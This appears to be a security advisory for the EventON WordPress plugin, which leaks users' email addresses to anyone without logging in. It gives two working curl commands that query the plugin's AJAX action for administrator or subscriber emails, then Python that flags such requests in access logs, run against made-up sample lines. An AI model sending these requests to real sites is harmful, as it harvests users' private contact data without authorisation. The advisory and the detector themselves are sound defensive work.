wpexploit | Erwan LR (WPScan) | WPEX-ID: E370B99A-F485-42BD-96A3-60432A15A4E9
History: Jan 10, 2024 - 12:00 a.m.

EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Email Address Disclosure

Tags: eventon, unauthenticated, email disclosure, exploit, administrator, subscriber

EPSS: 0.004 (Low), Percentile: 73.3%

Description: The plugins do not perform an authorisation check in an AJAX action, allowing unauthenticated users to retrieve the email addresses of any users on the blog.

To get the administrator user emails:

curl -X POST --data '_user_role=administrator' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users'

To get the subscriber user emails:

curl -X POST --data '_user_role=subscriber' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users'

The same request with other values of _user_role returns the email addresses of users in those roles.
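As an added detection example that is not part of the WPScan advisory, the Python below scans web-server access-log lines (Combined Log Format) for requests that invoke the vulnerable eventon_get_virtual_users AJAX action, normalising percent-encoded spellings of the action name and counting hits per source address. The log lines are constructed samples, not real traffic.

```python
"""Flag requests to the vulnerable EventON AJAX action in access logs.

Combined Log Format lines are parsed, the request target is decoded, and any
hit on admin-ajax.php whose `action` parameter is eventon_get_virtual_users is
reported with its source address and HTTP status.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

VULNERABLE_ACTION = "eventon_get_virtual_users"

# host ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def is_vulnerable_action_request(target: str) -> bool:
    """True for admin-ajax.php requests carrying action=eventon_get_virtual_users.

    parse_qs percent-decodes values, so an obfuscated spelling such as
    eventon%5Fget%5Fvirtual%5Fusers compares equal to the plain action name.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    return VULNERABLE_ACTION in parse_qs(parts.query).get("action", [])

def scan_access_log(lines):
    """Return (hits, per_host_counter) for lines invoking the vulnerable action."""
    hits, per_host = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_vulnerable_action_request(m["target"]):
            continue
        hits.append({"host": m["host"], "time": m["time"],
                     "method": m["method"], "status": int(m["status"])})
        per_host[m["host"]] += 1
    return hits, per_host

# Constructed sample log lines (not real traffic); only the first two should match.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:00:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1" 200 412 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Jan/2024:00:01:03 +0000] "POST /wp-admin/admin-ajax.php?foo=1&action=eventon%5Fget%5Fvirtual%5Fusers HTTP/1.1" 200 388 "-" "curl/8.4.0"',
    '198.51.100.2 - - [10/Jan/2024:00:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 54 "https://example.com/wp-admin/" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Jan/2024:00:02:05 +0000] "GET /blog/?action=eventon_get_virtual_users HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found, counts = scan_access_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["host"]} {h["method"]} -> {h["status"]}')
    print("hits per source:", dict(counts))
```

Because _user_role travels in the POST body, it does not appear in standard access logs; the action name in the query string is the observable indicator, and a 200 response to such a request from a host with no other admin activity is worth investigating.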

